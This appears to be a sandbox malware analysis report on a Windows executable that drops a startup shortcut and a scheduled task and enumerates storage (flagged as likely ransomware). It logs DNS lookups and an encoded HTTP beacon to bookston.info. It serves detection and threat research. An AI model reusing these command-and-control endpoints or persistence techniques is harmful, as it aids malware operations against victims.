Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
88s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
19/10/2022, 12:33 UTC
Static task
static1
Behavioral task
behavioral1
Sample
38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
Resource
win10v2004-20220901-en
General
-
Target
38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe
-
Size
295KB
-
MD5
91e2443a602bf99accecf6e13c04ff50
-
SHA1
4516b0b4377a2f8e59d49f3accc9eb2bed0d8271
-
SHA256
38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7
-
SHA512
f6dddafbe2ad2ae1a71422b1e0471a635a68f36ec4f934b7a74d72a6b6addaed0ea74e33a276e4dada4a1f4e29f7d756ddde667c4f93a1a56101fe24bbf8f112
-
SSDEEP
6144:VQ6Yd0LZbZhY2U1FCDvzqQy/yvnSV+1hSDh8rkcMgJHK35ITm:VQMZbZhYiDucaV+1h6LcoJ7
Malware Config
Signatures
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.lnk 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\Bidaily Synchronize Task.job 38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Processes
Network
-
Remote address:8.8.8.8:53Requestmembero.infoIN AResponse
-
Remote address:8.8.8.8:53Requestbookston.infoIN AResponsebookston.infoIN A58.158.177.102
-
GEThttp://bookston.info/hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exeRemote address:58.158.177.102:80RequestGET /hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXI HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Host: bookston.info
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
Content-Length: 201
Content-Type: text/html; charset=iso-8859-1
-
58.158.177.102:80http://bookston.info/hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXIhttp38532011b53a8b1f39c77576ba187e53abf72e8b2c3cae0a40db7030d027a2e7.exe903 B 513 B 5 3
HTTP Request
GET http://bookston.info/hp/?q=BTCIcYSK%2BFLItUmUMO68qzkuyL%2BSqfYyces%2BxnclouJekoE08JFDOTAp7K5vabHbRMgCA3TvKUFsjCRseID47NJFUhl4nI2YLdGS0hzSca8pnEeaZBEJLgffSH4eqQgSpfeoE8MEoXQ1a2n93zgzu2IPVg6NgMYevw%2FcUct6qC5pHJ2nL0TBPafNXdebkZAsGzRsvPdhtgVa%2Bv8GycontspaG1JpmZztm5GKosMC0os99J%2FkiWMZ5MBoRWIsdGo3ms0a1Coxyen6yrvlh70E6FiGJoUrTmH4jSbBKO3ronG86RGCPzBoWOMnve9k42ABud2EC1Di2zqqqZvD47NZq9gwAs0MP39huI90swsmV4Py89P%2B%2BOBS%2FLEwBDlZAGu7j64PaJ1Ywy0i42qE2EQRiM20zU2WSLWEy9afD7vl%2F%2FVfC8cW9jviRxMIoxUfc1BKzoSqWdAcvo0%2FVM8oymXIHTTP Response
404 -
322 B 7
-
611 B 7.4kB 9 9
-
322 B 7
-
322 B 7
-
322 B 7
-
58 B 137 B 1 1
DNS Request
membero.info
-
59 B 75 B 1 1
DNS Request
bookston.info
DNS Response
58.158.177.102